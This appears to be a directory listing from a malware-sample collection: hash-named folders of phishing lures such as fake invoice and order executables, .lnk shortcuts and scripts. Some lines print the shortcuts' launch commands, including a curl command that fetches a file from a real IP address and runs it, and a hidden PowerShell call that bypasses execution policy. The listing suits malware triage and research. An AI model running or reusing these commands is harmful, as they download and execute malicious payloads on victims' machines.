.\4d4ff7d4c46ae00c2ddc7e2553356d6c4caf9ba446a0758154f7b518de04b5a54d4ff7d4c46ae00c2ddc7e2553356d6c4caf9ba446a0758154f7b518de04b5a5_1661938884['.\4d4ff7d4c46ae00c2ddc7e2553356d6c4caf9ba446a0758154f7b518de04b5a5_1661938884/Order Confirmation E220079734453 - SUMAN DOO.vbs']
.\4d9b68420ff277644162b0ee30463c7fa08bbd5123700fe0313d5b0ab98672b44d9b68420ff277644162b0ee30463c7fa08bbd5123700fe0313d5b0ab98672b4_1661938884['.\4d9b68420ff277644162b0ee30463c7fa08bbd5123700fe0313d5b0ab98672b4_1661938884/Draft BL AP03EMI058230522.vbs']
.\513a4ea3029a12e4cc61aca4df8d4276b668b8254b8d89490c64635f36c8df51513a4ea3029a12e4cc61aca4df8d4276b668b8254b8d89490c64635f36c8df51_1661938884['.\513a4ea3029a12e4cc61aca4df8d4276b668b8254b8d89490c64635f36c8df51_1661938884/견적 요청 p.0-202208100237KR.exe']
.\513dc4df604bfb269f41e79f117dce3212b26e93395a18946a4233eb3288d22b513dc4df604bfb269f41e79f117dce3212b26e93395a18946a4233eb3288d22b_1661938884['.\513dc4df604bfb269f41e79f117dce3212b26e93395a18946a4233eb3288d22b_1661938884/Solicitud de cotización factura 17-08-2022.exe']
.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df28415153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884"['.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/ASQA.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/BAckdoor.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Behaveslike.BAT.GEN.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Cyber Security antivirus NEW 0.1.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/FileDelVirus.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/J.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Jayandk.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Malware-ROz.win32.application.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Minecraft hack tools setup ( TURN OFF ANTIVITUS ).EXE', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/New Text Document.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/ROZBEH RANSOMWARE 4.0.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/SYSROZBEH.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/ScriptWormROZ.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Simple game!.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Softwareupdator tools for classic.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Softwareupdator tools for classic_original.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Softwareupdator tools for classicasasasasas.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/TRJrozbeh.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan NPC Cyber cide 2.1.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan ROZ Cyber cide 2.1.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan ROZ Cyber cide 2.1.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan rozbeh.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan.Generic.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan.Winkill.rozbeh.A.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Trojan.winkill.32.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/TrojanWIN32.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Untitled1.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/WALKER.COM', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/alpha test.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/avata Security antivirus.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/avata antivirus.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/backdoorROZ.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/badrabit.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/bomb.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/fata.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/goldenEye.bat', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/goldenEye.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/rozbehWORM123.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/rozbehworm.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/rozbehworm.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/rozmalwareURSU.txt', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/sdad.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Bosses/End of the line.ROZbEH.TRJ.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Bosses/Trojan.Dropper.ROZBEH.A.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Bosses/Trojan.Evilbot.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Bosses/Trojan.behind the mask.ROZBEH.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Bosses/Trojan.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/Bosses/goldenEye.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/BehavesLike.VBS.Backdoor.xp.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Heru.BZC.ONG.Leonarddf08cc3.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Makefile.win', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Project2.dev', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Project2.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Project2.layout', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/TRJA.vbs', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Trojan.Generic.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Trojan.ROZBEH.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Trojan.behind the mask.ROZBEH.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/Trojan.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/TrojanWIn32ROZBEH.exe', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/main.cpp', '.\5153d5dd02d9de6581177b5f41f538263b43ed6579ba14ae332d191177df2841_1661938884/CVIRUS/main.o']"
.\52058faeb4ee060a33037f5907623f00676831def505649385a8bfe164a5d08752058faeb4ee060a33037f5907623f00676831def505649385a8bfe164a5d087_1661938884['.\52058faeb4ee060a33037f5907623f00676831def505649385a8bfe164a5d087_1661938884/Doc10028.exe;1']
.\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884"['.\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884/Unpaid_order-.lnk', '.\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884/about/him.txt', '.\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884/about/time.dat', '.\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884/about/worker.cmd', '.\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884/about/worker.js']".\53818944e4763edb60f9601685ae3cb1893e14d71f7a9fb063456bdaad3bfedf_1661938884/Unpaid_order-.lnkabout/worker.cmd
.\540beced4b68bb40737673554e08e3c224c3231b0634d3fba8a61c4f20a07876540beced4b68bb40737673554e08e3c224c3231b0634d3fba8a61c4f20a07876_1661938884['.\540beced4b68bb40737673554e08e3c224c3231b0634d3fba8a61c4f20a07876_1661938884/StudioOne_Keygen.exe']
.\5457c4d6086e83da0efde5b7e1b839698121a723aacb1702f7c32ff7e98765455457c4d6086e83da0efde5b7e1b839698121a723aacb1702f7c32ff7e9876545_1661938884"['.\5457c4d6086e83da0efde5b7e1b839698121a723aacb1702f7c32ff7e9876545_1661938884/Přiloženy jsou naše objednávkové dokumenty PT578, pdf.exe']"
.\54b520ebbf9f6baae305b159ed160e5f8800325220e09ff378bd789c126f0bce54b520ebbf9f6baae305b159ed160e5f8800325220e09ff378bd789c126f0bce_1661938884"['.\54b520ebbf9f6baae305b159ed160e5f8800325220e09ff378bd789c126f0bce_1661938884/Scantec Nordic AB YENİ SİPARİŞ,pdf.exe']"
.\559404f166eed3c10cb0c132b8f431c07d5f40bde7b10e5d8a17bfafcc71a2d6559404f166eed3c10cb0c132b8f431c07d5f40bde7b10e5d8a17bfafcc71a2d6_1661938884"['.\559404f166eed3c10cb0c132b8f431c07d5f40bde7b10e5d8a17bfafcc71a2d6_1661938884/0a4b022d6865dc32bb246c8b57aadb06', '.\559404f166eed3c10cb0c132b8f431c07d5f40bde7b10e5d8a17bfafcc71a2d6_1661938884/0edae674d07a68eda7497a10c580bdee']"
.\55b2b93d1e4ad731dad279a626486a8a6b352cf176d947ced1ccc0d3fa00163955b2b93d1e4ad731dad279a626486a8a6b352cf176d947ced1ccc0d3fa001639_1661938884['.\55b2b93d1e4ad731dad279a626486a8a6b352cf176d947ced1ccc0d3fa001639_1661938884/KE160899220817.exe']
.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884"['.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/invoice-not-paid-date08-08-22-pdf.lnk', '.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/at/but.txt', '.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/at/butGetThereThisHer.js', '.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/at/makeVeryOtherSomeWe.bat', '.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/at/time.gif', '.\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/at/whenWhoManyAsWho.txt']".\560bf15a827665da0ea1eca26ccea7db27f8814b2b2a86eda04c76c187e59737_1661938884/invoice-not-paid-date08-08-22-pdf.lnkat/makeVeryOtherSomeWe.bat
.\56dbe7e2da613a1b6cc6b79a3d4bff65388fadd690ae581fbc07a98bd956646156dbe7e2da613a1b6cc6b79a3d4bff65388fadd690ae581fbc07a98bd9566461_1661938884"['.\56dbe7e2da613a1b6cc6b79a3d4bff65388fadd690ae581fbc07a98bd9566461_1661938884/Ordene 501527,pdf.exe']"
.\578647807521bfbfd7037971ea4bf29a586164dd8cb7ac9266dfe03b05677fcb578647807521bfbfd7037971ea4bf29a586164dd8cb7ac9266dfe03b05677fcb_1661938884"['.\578647807521bfbfd7037971ea4bf29a586164dd8cb7ac9266dfe03b05677fcb_1661938884/异质电力变压器采购订单 34637DG,pdf.exe']"
.\5ad6fbbf83eac022c856f34c454220f6d6f198f41cf23c1b38a85fab962109585ad6fbbf83eac022c856f34c454220f6d6f198f41cf23c1b38a85fab96210958_1661938884"['.\5ad6fbbf83eac022c856f34c454220f6d6f198f41cf23c1b38a85fab96210958_1661938884/DHL_227040 alındı belgesi,pdf.exe']"
.\5cc7ff3bce7ad83ebab6bd747418fa9b708d9a8d949ad08c430c028cb9884c275cc7ff3bce7ad83ebab6bd747418fa9b708d9a8d949ad08c430c028cb9884c27_1661938884['.\5cc7ff3bce7ad83ebab6bd747418fa9b708d9a8d949ad08c430c028cb9884c27_1661938884/VOP CZ_objednávka 221M0345.exe']
.\5d115f915309d2d9d12bc1dafb24ff8a3cc20ba94da0da9eb92f66e04a27ce2f5d115f915309d2d9d12bc1dafb24ff8a3cc20ba94da0da9eb92f66e04a27ce2f_1661938884['.\5d115f915309d2d9d12bc1dafb24ff8a3cc20ba94da0da9eb92f66e04a27ce2f_1661938884/FILE__DOC6737364645.vbs']
.\5d308cd34238174c523cac19b8c271f0539b0d6dc054d062b7dd129f7ca70e125d308cd34238174c523cac19b8c271f0539b0d6dc054d062b7dd129f7ca70e12_1661938884"['.\5d308cd34238174c523cac19b8c271f0539b0d6dc054d062b7dd129f7ca70e12_1661938884/CH440-3031 New Inquiry 13822.exe', '.\5d308cd34238174c523cac19b8c271f0539b0d6dc054d062b7dd129f7ca70e12_1661938884/logo.png']"
.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad93215e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884"['.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/Personal data.lnk', '.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/two/ifMan.js', '.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/two/noCan.txt', '.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/two/someTwo.bat', '.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/two/year.gif', '.\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/two/your.txt']".\5e2864bcf3b59f5636ea20d28522ab382680b5b65526e7d6447f787e0aad9321_1661938884/Personal data.lnktwo/someTwo.bat
.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884"['.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/documents.lnk', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/by.txt', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/day.gif', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/he.png', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/herCouldHisGiveHe.txt', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/sayForNowSoOr.bat', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/theirUpTwoWeCome.js', '.\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/then/use.txt']".\5eaa4a28a6d908710036aecce002601795d2a2c8233a866ec204d8fc6590009f_1661938884/documents.lnkthen/sayForNowSoOr.bat
.\5eddde06ae42eada05ff787b61b578da95afa7246fa126c1901acba6d9ff81125eddde06ae42eada05ff787b61b578da95afa7246fa126c1901acba6d9ff8112_1661938884['.\5eddde06ae42eada05ff787b61b578da95afa7246fa126c1901acba6d9ff8112_1661938884/FILE677890977_67278827635.vbs']
.\5fee300058f326961c9eeffd3006af8361cbd92b53d58bb631581345b510e2e95fee300058f326961c9eeffd3006af8361cbd92b53d58bb631581345b510e2e9_1661938884['.\5fee300058f326961c9eeffd3006af8361cbd92b53d58bb631581345b510e2e9_1661938884/ryDalaWq3ijjXvY.exe']
.\6020884917b23c9b72a88b46b3cb30678b39ee659d94110be923d3f4792671326020884917b23c9b72a88b46b3cb30678b39ee659d94110be923d3f479267132_1661938884"['.\6020884917b23c9b72a88b46b3cb30678b39ee659d94110be923d3f479267132_1661938884/Attachment.jpg', '.\6020884917b23c9b72a88b46b3cb30678b39ee659d94110be923d3f479267132_1661938884/Attachment.jpg.lnk', '.\6020884917b23c9b72a88b46b3cb30678b39ee659d94110be923d3f479267132_1661938884/z.ps1']".\6020884917b23c9b72a88b46b3cb30678b39ee659d94110be923d3f479267132_1661938884/Attachment.jpg.lnkWindows/System32/WindowsPowerShell/v1.0/powershell.exe-exec bypass -w h -file z.ps1
.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e0818006062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884"['.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/documents.lnk', '.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/their/as.txt', '.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/their/firstSheKnowTheyPeople.js', '.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/their/from.txt', '.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/their/itOurMakeThemThan.txt', '.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/their/ourOrItIfOr.bat', '.\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/their/who.jpg']".\6062a6dab6078075f6d76fd3707a3efd45b77061251064cd93c898729e081800_1661938884/documents.lnktheir/ourOrItIfOr.bat
.\6149c38f7c934e9666cd90810c5c3cb97378a9654b6c7fd1189f5b97efe0ecf06149c38f7c934e9666cd90810c5c3cb97378a9654b6c7fd1189f5b97efe0ecf0_1661938884"['.\6149c38f7c934e9666cd90810c5c3cb97378a9654b6c7fd1189f5b97efe0ecf0_1661938884/RFQ 103404_00108182022,pdf.exe']"
.\61b40031199a78de07ee4c6dfbbfdd8068015a6e17efc9a8db0ddbcb9391809661b40031199a78de07ee4c6dfbbfdd8068015a6e17efc9a8db0ddbcb93918096_1661938884['.\61b40031199a78de07ee4c6dfbbfdd8068015a6e17efc9a8db0ddbcb93918096_1661938884/Product sample1102.exe']
.\61ec8f9ca2a26a56faa7f43a6b28c986fa9509a13fb47f67743bdb7f9911bd0a61ec8f9ca2a26a56faa7f43a6b28c986fa9509a13fb47f67743bdb7f9911bd0a_1661938884['.\61ec8f9ca2a26a56faa7f43a6b28c986fa9509a13fb47f67743bdb7f9911bd0a_1661938884/Remittance Advice_pdf .exe']
.\61ef869ff60a5a293b2662a0626843ef4d69deef00ab6dee85fe22c6aaaa292661ef869ff60a5a293b2662a0626843ef4d69deef00ab6dee85fe22c6aaaa2926_1661938884['.\61ef869ff60a5a293b2662a0626843ef4d69deef00ab6dee85fe22c6aaaa2926_1661938884/Mznjxtgcmhgzwqxarprsfoftvgdkltcfho.exe']
.\622a3c546a67f0966d974b5e742461a2245c9f4056661e6844f9686010990158622a3c546a67f0966d974b5e742461a2245c9f4056661e6844f9686010990158_1661938884['.\622a3c546a67f0966d974b5e742461a2245c9f4056661e6844f9686010990158_1661938884/Purchase_Order-(P.O_60924816_08)_Welt_SPA.exe']
.\62751a2088a2237f60201e3f1f89ce91c2877072bec0e965233f032fe5e1675962751a2088a2237f60201e3f1f89ce91c2877072bec0e965233f032fe5e16759_1661938884['.\62751a2088a2237f60201e3f1f89ce91c2877072bec0e965233f032fe5e16759_1661938884/New Order-RFQ-2022290816-Pdf.exe']
.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b46398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884"['.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/Personal data.lnk', '.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/two/himA.txt', '.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/two/otherGive.bat', '.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/two/wantTake.js', '.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/two/year.gif', '.\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/two/your.txt']".\6398d86522123cf380af6d4ace2f4a128973af4d64ae39b9cda39a4d682a04b4_1661938884/Personal data.lnktwo/otherGive.bat
.\64aa124c335c01ba840a7949afaadb4005ac8682b35fbdc27c48860f9ff7ffb464aa124c335c01ba840a7949afaadb4005ac8682b35fbdc27c48860f9ff7ffb4_1661938884
.\66006803e3b2d409c99dffbba45b6d308126748e97b0c9054f640eeabb00d68266006803e3b2d409c99dffbba45b6d308126748e97b0c9054f640eeabb00d682_1661938884"['.\66006803e3b2d409c99dffbba45b6d308126748e97b0c9054f640eeabb00d682_1661938884/Adjunto Nuestro Recibo de Pedidos JT4538,pdf.exe']"
.\6728208188132428a807912c02ac158c1e25c950287aa2412070395d6f5b9b7e6728208188132428a807912c02ac158c1e25c950287aa2412070395d6f5b9b7e_1661938884['.\6728208188132428a807912c02ac158c1e25c950287aa2412070395d6f5b9b7e_1661938884/Nuevo pedido RFQ-2022-08-09.exe']
.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884"['.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/Invoice-August-09-2022pdf.lnk', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/give.txt', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/ifMakeTheirFirstWho.js', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/onlyVeryWantHaveOr.txt', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/say.txt', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/tell.txt', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/thing.gif', '.\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/your/toFirstIntoMakeSay.bat']".\67a8891ebd0930a79d3222e2af7c915b85a2330d100c83892128d698f9958b9f_1661938884/Invoice-August-09-2022pdf.lnkyour/toFirstIntoMakeSay.bat
.\67c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a8367c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a83_1661938884"['.\67c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a83_1661938884/documents.lnk', '.\67c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a83_1661938884/one/getKnow.js', '.\67c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a83_1661938884/one/newA.bat', '.\67c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a83_1661938884/one/yearThese.txt']".\67c375a8555108693bcf2f3fa85da9baa1efcfd2bcc09fddc2676580a9fd8a83_1661938884/documents.lnkone/newA.bat
.\68ed4dfd779bbc1b6c8958a86f02f6a4046532fcd8eea3e5b8ca74cd296343fe68ed4dfd779bbc1b6c8958a86f02f6a4046532fcd8eea3e5b8ca74cd296343fe_1661938885['.\68ed4dfd779bbc1b6c8958a86f02f6a4046532fcd8eea3e5b8ca74cd296343fe_1661938885/screenshot_wesco_aex45efol\u202e fdр..exe']
.\6b8f0ee91a8c77c7c4ee434b687e2b1e06f0798d243759bebe6248be7be734346b8f0ee91a8c77c7c4ee434b687e2b1e06f0798d243759bebe6248be7be73434_1661938885['.\6b8f0ee91a8c77c7c4ee434b687e2b1e06f0798d243759bebe6248be7be73434_1661938885/FILE455665544_66652525562.vbs']
.\6bfd0eba70e49d5d28e778b5ebe7e66de26c6253cf34c0d0b736c84040c4fab16bfd0eba70e49d5d28e778b5ebe7e66de26c6253cf34c0d0b736c84040c4fab1_1661938885['.\6bfd0eba70e49d5d28e778b5ebe7e66de26c6253cf34c0d0b736c84040c4fab1_1661938885/installer_1_4_1-6977.exe']
.\6ddddcdf707428dbf568ca0cc638f8f619e7aba031d59e6be5ec4826cde7b2d06ddddcdf707428dbf568ca0cc638f8f619e7aba031d59e6be5ec4826cde7b2d0_1661938885['.\6ddddcdf707428dbf568ca0cc638f8f619e7aba031d59e6be5ec4826cde7b2d0_1661938885/20-00030.exe']
.\6e0461ac5f647d3119a475e2dcccd68e666ee86133bf00bd1c982b25926a8f106e0461ac5f647d3119a475e2dcccd68e666ee86133bf00bd1c982b25926a8f10_1661938885['.\6e0461ac5f647d3119a475e2dcccd68e666ee86133bf00bd1c982b25926a8f10_1661938885/Doc61630.bat']
.\6e8d195a36bd2aa759068a16b203cb7852cb20a4a18ffdd551f5bb4269b3f9f56e8d195a36bd2aa759068a16b203cb7852cb20a4a18ffdd551f5bb4269b3f9f5_1661938885['.\6e8d195a36bd2aa759068a16b203cb7852cb20a4a18ffdd551f5bb4269b3f9f5_1661938885/lebenslauf_2022068 .pdf.lnk'].\6e8d195a36bd2aa759068a16b203cb7852cb20a4a18ffdd551f5bb4269b3f9f5_1661938885/lebenslauf_2022068 .pdf.lnkWindows/System32/forfiles.exe"/m *lnk /c ""cmd /c cur^l http://185.45.192.234/re.css -o ""%temp%\l64d3d.cmd""&&""%temp%\l64d3d.cmd""&&exit"""
.\6f5bb4b27960ed6d2aac0ead06fb5481ee358b4553312910c0443431265d3ab96f5bb4b27960ed6d2aac0ead06fb5481ee358b4553312910c0443431265d3ab9_1661938885"['.\6f5bb4b27960ed6d2aac0ead06fb5481ee358b4553312910c0443431265d3ab9_1661938885/IK_Multimedia_Keygen.exe', '.\6f5bb4b27960ed6d2aac0ead06fb5481ee358b4553312910c0443431265d3ab9_1661938885/R2R.txt']"
.\6fe43ddf5c0717045cb48b04f6ac1dc6005585853cedbee8f9a523913282bf0f6fe43ddf5c0717045cb48b04f6ac1dc6005585853cedbee8f9a523913282bf0f_1661938885
.\7344adf8aec212b37bfa865687af83b1e5e99bce5fba6c14f931e14511c01e857344adf8aec212b37bfa865687af83b1e5e99bce5fba6c14f931e14511c01e85_1661938885['.\7344adf8aec212b37bfa865687af83b1e5e99bce5fba6c14f931e14511c01e85_1661938885/TNT AWB & INVOICE (2).exe']
.\73a25bbed622f4f1e18de866f24a3fc7b8398b54ca83d0778fa8e80d264e155f73a25bbed622f4f1e18de866f24a3fc7b8398b54ca83d0778fa8e80d264e155f_1661938885['.\73a25bbed622f4f1e18de866f24a3fc7b8398b54ca83d0778fa8e80d264e155f_1661938885/commercial invoice.exe']
.\73c6bf9070a559e264c15ca631f4e2de35984cbbb71c4eeda0c15ca4482014b473c6bf9070a559e264c15ca631f4e2de35984cbbb71c4eeda0c15ca4482014b4_1661938885['.\73c6bf9070a559e264c15ca631f4e2de35984cbbb71c4eeda0c15ca4482014b4_1661938885/Svovliltens.exe']
